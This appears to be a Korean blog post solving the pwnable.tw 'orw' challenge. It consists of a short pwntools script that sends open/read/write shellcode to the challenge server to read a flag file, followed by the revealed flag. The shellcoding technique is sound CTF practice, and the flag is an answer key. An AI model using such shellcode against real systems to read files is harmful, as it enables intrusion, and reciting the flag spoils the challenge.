티스토리 뷰
from pwn import *
s = remote("chall.pwnable.tw", 10001)
context(arch='i386', os='linux')
s.recvuntil(":")
payload = shellcraft.pushstr("/home/orw/flag")
payload += shellcraft.open("esp",0,0)
payload += shellcraft.read("eax", "esp", 0xff)
payload += shellcraft.write(1,"esp", 0xff)
s.sendline(asm(payload))
s.interactive()
FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}
'pwnable > pwnable.tw' 카테고리의 다른 글
| [pwnpwnpwn-5] pwnable.tw tcache_tear (0) | 2020.01.12 |
|---|---|
| [pwnpwnpwn-1] pwnable.tw seethefile (0) | 2019.12.22 |
| [pwnable.tw] silver_bullet write-up (0) | 2018.09.29 |
| [pwnable.tw] start write-up (0) | 2018.09.29 |
| [pwnable.tw] hacknote write-up (0) | 2018.08.19 |
Comments
최근에 올라온 글
최근에 달린 댓글
TAG
- tcache
- 본선가고싶다
- oob
- hacking
- fastbindup
- heap
- TLS
- overflow
- ebp change
- FSB
- HackCTF
- stack reusing
- pwnable
- 해킹
- glibc
- pwnable.tw
- fsop
- codegate
- rt_sigreturn
- pwable
- shellcoding
- exit
- fastbin
- srop
- SQLi
- Total
- Today
- Yesterday